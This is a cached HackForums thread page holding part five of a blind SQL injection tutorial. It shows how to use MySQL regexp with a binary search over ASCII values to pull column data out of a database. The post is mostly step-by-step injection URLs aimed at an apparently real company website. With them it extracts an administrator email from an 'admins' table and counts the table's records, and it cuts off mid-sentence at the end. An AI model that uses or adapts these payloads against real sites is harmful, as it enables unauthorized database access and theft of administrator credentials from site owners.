<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3388044" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3388044" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3388044</a>. It is a snapshot of the page as it appeared on 4 Feb 2014 23:24:35 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3388044" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:nEYYrQ-vvjUJ:www.hackforums.net/showthread.php%3Ftid%3D3388044&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] boolean based blind SQLi using regexp with binary search - part #5 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] boolean based blind SQLi using regexp with binary search - part #5"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3388044"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-04-2014, 04:24 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] boolean based blind SQLi using regexp with binary search - part #5</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3388044" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/rating.js"></script><div id="success_rating_3388044" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3388044"><li style="width: 0%" class="current_rating" id="current_rating_3388044">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3388044&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3388044&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3388044&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3388044&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3388044&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3388044" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3388044_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3388044" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3388044&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3388044");
// -->
</script><div><strong>[Tutorial] boolean based blind SQLi using regexp with binary search - part #5</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid31780412" id="pid31780412"></a><table class="tborder" style="border-top-width: 0; " id="post_31780412" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-09-2013, 12:46 PM <span id="edited_by_31780412"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;pid=31780412#pid31780412">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a> </td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 130<br>Posts: 2,102<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">191</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31780412">This tutorial has five parts. This is part <span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">#5</span></span></span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3385306" target="_blank">part #1</a>
 we learned about binary search and regexp. We also learned how to test 
for vulnerability, test for version(), count number of databases and 
number of tables in database() and what is result <span style="color: #32CD32;">true </span>and what <span style="color: #FF4500;">false </span>using boolean based blind SQLi.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3387210" target="_blank">part #2</a> we learned how to get table names using boolean based blind SQLi.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3387759" target="_blank">part #3</a>
 we learned how to get column names using boolean based blind SQLi. I 
showed also some tricks to find columns with common column name like <span style="color: #32CD32;">pass</span> and to find out in which table this column exists.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3387811" target="_blank">part #4</a>
 we learned how to get table names when magic_quotes_gpc directive is 
turned on so we must change regexp part to hex or convert it using 
function char().<br><br>To fully understand this tutorial you should be familiar with information from part #1, #2, #3 and #4 <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Searching for data from some column</span></span><br><br>For
 searching table/column names in previous parts we used range 36-122 
because we know ascii values for table/column names can be in range 
36-122. Allowed characters are: digits 0-9, basic Latin letters a-z A-Z,
 dollar, underscore (<a href="http://dev.mysql.com/doc/refman/5.0/en/identifiers.html%29." target="_blank">http://dev.mysql.com/doc/refman/5.0/en/i...ers.html).</a> Those characters have ascii values in range 36-122.<br><br>If
 we are searching for data from some column we can adjust this range. 
For example if we want to extract MD5 hash we know MD5 can contain only 
digits 0 - 9 and letter a - f. If we look in ascii table for those 
characters we see minimal ascii value is 48 (digit 0) and maximal ascii 
value is 102 (letter f). That is why 48 and 102 would be our min and max
 value for first attempt in our binary search to get MD5 hash.<br><br>In
 this tutorial #5 we will search from ascii value 32 (space) to ascii 
value 126 (~) as our maximum value. Our initial range will be 32 - 126. 
So using our formula <span style="color: #FFD700;">mid=(max+min)/2</span> we can calculate our first mid value: (126+32)/2 = 79.<br><br>In previous parts of this tutorial we learned how to get table names and columns. So we know for example table name <span style="color: #FFA500;">admins </span>has column <span style="color: #FFA500;">email</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span>
 - ascii range to search: 32 - 126; mid=79; we will use ascii 79 (O) and
 ascii 126 (~) so our regexp will be ^[O-~] converted to char = CHAR(94,
 91, 79, 45, 126, 93) </span><br>Let us try if first character in column has ascii value in upper half of possible initial range 32-126. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 79, 45, 
126, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #32CD32;">true </span>-
 site loads fine. Let's change our min value. This time it will be 79 
because in previous step we get result true testing ascii value of first
 character in range 79-126. After we recalculate our formula 
mid=(max+min)/2 --&gt; (126+79)/2=103 (102.5 rounded up to 103) we get 
new mid value 103 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span>
 - ascii range to search: 79 - 126; mid=103; we will use ascii 103 (g) 
and ascii 126 (~) so our regexp will be ^[g-~] converted to char = 
CHAR(94, 91, 103, 45, 126, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 79-126. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 103, 45, 
126, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 79 - 
126, so we must search for it in lower part of our last range. Our max 
value must be modified to 103. After we recalculate our formula 
mid=(max+min)/2 --&gt; (103+79)/2=91 we get new mid value 91 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span>
 - ascii range to search: 79 - 103; mid=91; we will use ascii 91 ([) and
 ascii 103 (g) so our regexp will be ^[[-g] converted to char = CHAR(94,
 91, 91, 45, 103, 93) </span><br>Let us try if first character in column has ascii value in upper half of latest range 79-103. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 91, 45, 
103, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #32CD32;">true </span>-
 site loads fine. Let's change our min value. This time it will be 91 
because in previous step we get result true testing ascii value of first
 character in range 91-103. After we recalculate our formula 
mid=(max+min)/2 --&gt; (103+91)/2=97 we get new mid value 97 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span>
 - ascii range to search: 91 - 103; mid=97; we will use ascii 97 (a) and
 ascii 103 (g) so our regexp will be ^[a-g] converted to char = CHAR(94,
 91, 97, 45, 103, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 91-103. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 97, 45, 
103, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #32CD32;">true </span>-
 site loads fine. Let's change our min value. This time it will be 97 
because in previous step we get result true testing ascii value of first
 character in range 97-103. After we recalculate our formula 
mid=(max+min)/2 --&gt; (103+97)/2=100 we get new mid value 100 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span>
 - ascii range to search: 97 - 103; mid=100; we will use ascii 100 (d) 
and ascii 103 (g) so our regexp will be ^[d-g] converted to char = 
CHAR(94, 91, 100, 45, 103, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 97-103. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 100, 45, 
103, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 97 - 
103, so we must search for it in lower part of our last range. Our max 
value must be modified to 100. After we recalculate our formula 
mid=(max+min)/2 --&gt; (100+97)/2=99 (98.5 rounded up to 99) we get new 
mid value 99 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span>
 - ascii range to search: 97 - 100; mid=99; we will use ascii 99 ( c ) 
and ascii 100 (d) so our regexp will be ^[c-d] converted to char = 
CHAR(94, 91, 99, 45, 100, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 97-100. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 99, 45, 
100, 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 97 - 
100, so we must search for it in lower part of our last range. Our max 
value must be modified to 99. After we recalculate our formula 
mid=(max+min)/2 --&gt; (99+97)/2=98 we get new mid value 98 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span>
 - ascii range to search: 97 - 99; mid=98; we will use ascii 98 (b) and 
ascii 99 ( c ) so our regexp will be ^[b-c] converted to char = CHAR(94,
 91, 98, 45, 99, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 97-99. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 98, 45, 99,
 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 97 - 
99, so we must search for it in lower part of our last range. Our max 
value must be modified to 98. After we recalculate our formula 
mid=(max+min)/2 --&gt; (98+97)/2=98 (97.5 rounded up to 98) we get new 
mid value 98 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 8</span>
 - ascii range to search: 97 - 98; mid=98; we will use ascii 98 (b) and 
ascii 98 (b) so our regexp will be ^[b-b] converted to char = CHAR(94, 
91, 98, 45, 98, 93) </span><br>Let us try if first character in column has ascii value in upper half of our latest range 97-98. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 98, 45, 98,
 93) limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>. First character's ascii value is not in upper part of our range 97 - 98, so we know for sure it can be only 97. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> First character in our column is <span style="font-weight: bold;"><span style="color: #32CD32;">a</span></span> (ascii 97). Lets remember that or better write it on the paper.<br><br><hr><br>Let's search for the <span style="color: #FFA500;">second character</span> in our column email. Our regexp command will change slightly as we will add our first letter <span style="color: #32CD32;">a</span> so regexp is<br><span style="color: #00BFFF;">regexp '^a[x-y]'</span>. For x and y value we will insert character with ascii value in specific range as with previous character in column.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span>
 - ascii range to search: 32 - 126; mid=79; we will use ascii 79 (O) and
 ascii 126 (~) so our regexp will be regexp ^a[O-~] converted to char = 
CHAR(94, 97, 91, 79, 45, 126, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 79, 45,
 126, 93) limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span>
 - ascii range to search: 79 - 126; mid=103; we will use ascii 103 (g) 
and ascii 126 (~) so our regexp will be regexp ^a[g-~] converted to char
 = CHAR(94, 97, 91, 103, 45, 126, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 103, 
45, 126, 93) limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span>
 - ascii range to search: 79 - 103; mid=91; we will use ascii 91 ([) and
 ascii 103 (g) so our regexp will be regexp ^a[[-g] converted to char = 
CHAR(94, 97, 91, 91, 45, 103, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 91, 45,
 103, 93) limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span>
 - ascii range to search: 91 - 103; mid=97; we will use ascii 97 (a) and
 ascii 103 (g) so our regexp will be regexp ^a[a-g] converted to char = 
CHAR(94, 97, 91, 97, 45, 103, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 97, 45,
 103, 93) limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span>
 - ascii range to search: 97 - 103; mid=100; we will use ascii 100 (d) 
and ascii 103 (g) so our regexp will be regexp ^a[d-g] converted to char
 = CHAR(94, 97, 91, 100, 45, 103, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 100, 
45, 103, 93) limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span>
 - ascii range to search: 100 - 103; mid=102; we will use ascii 102 (f) 
and ascii 103 (g) so our regexp will be regexp ^a[f-g] converted to char
 = CHAR(94, 97, 91, 102, 45, 103, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 102, 
45, 103, 93) limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span>
 - ascii range to search: 100 - 102; mid=101; we will use ascii 101 (e) 
and ascii 102 (f) so our regexp will be regexp ^a[e-f] converted to char
 = CHAR(94, 97, 91, 101, 45, 102, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 101, 
45, 102, 93) limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 8</span>
 - ascii range to search: 100 - 101; mid=101; we will use ascii 101 (e) 
and ascii 101 (e) so our regexp will be regexp ^a[e-e] converted to char
 = CHAR(94, 97, 91, 101, 45, 101, 93)</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 91, 101, 
45, 101, 93) limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br>Because
 our character isn't in upper half of range 100-101 (101) it can be only
 in lower half (100). So our next character has ascii value 100 --&gt; <span style="color: #32CD32;"><span style="font-weight: bold;">d</span></span>. Till now we know two characters from our column are <span style="font-weight: bold;"><span style="color: #32CD32;">ad</span></span>.<br><br>I am sure you get the picture how to continue. Next character will be <span style="color: #32CD32;">m</span>... so finally we will get our first column value <span style="font-weight: bold;"><span style="color: #32CD32;">admin@marina.com</span></span> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> How to know when we found complete column value? With testing all founded characters so far like regexp <span style="color: #32CD32;">^</span><span style="color: #FFD700;">admin@marina.com</span><span style="color: #32CD32;">$</span>
 (regexp 0x0x5e61646d696e406d6172696e612e636f6d24 or regexp CHAR(94, 97,
 100, 109, 105, 110, 64, 109, 97, 114, 105, 110, 97, 46, 99, 111, 109, 
36)).<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 97, 100, 109, 
105, 110, 64, 109, 97, 114, 105, 110, 97, 46, 99, 111, 109, 36) limit 
0,1)-- -</code></div></div>Response <span style="color: #32CD32;">True</span> confirms that.<br><br><hr><br>Lets try to get second value for column email (record #2).<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span>
 - ascii range to search: 32 - 126; mid=79; we will use ascii 79 (O) and
 ascii 126 (~) so our regexp will be ^[O-~] converted to char = CHAR(94,
 91, 79, 45, 126, 93) </span><br>Let us try if first character in column has ascii value in upper half of possible initial range 32-126. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13
 and 1=(select 1 from admins where email regexp CHAR(94, 91, 79, 45, 
126, 93) limit 1,1)-- -</code></div></div><br>We <span style="font-weight: bold;"><span style="color: #FFA500;">changed limit part</span></span> from <span style="color: #FFD700;">0,1</span> to <span style="color: #32CD32;">1,1</span> !!!<br><br>Result is <span style="color: #FF4500;">false</span>. Means no more data in column email.<br><br>We can check this also with using different numbers in command. Like testing if there are 100 records in table:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13 and 100=(select count(*) from admins)-- -</code></div></div>Response <span style="color: #FF4500;">false</span><br><br>Only testing for one record (<span style="color: #32CD32;">1=</span>) in table like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13 and 1=(select count(*) from admins)-- -</code></div></div>gives us response <span style="color: #32CD32;">true</span> - there is only one record in table admins<br><br>Thanks
 for reading. I tested all example code in all five parts and I hope 
there are no errors. With blind SQLi you must use ascii table, 
calculator for calculating latest range for binary search and some notes
 to write down latest result. And you must be very concentrated and 
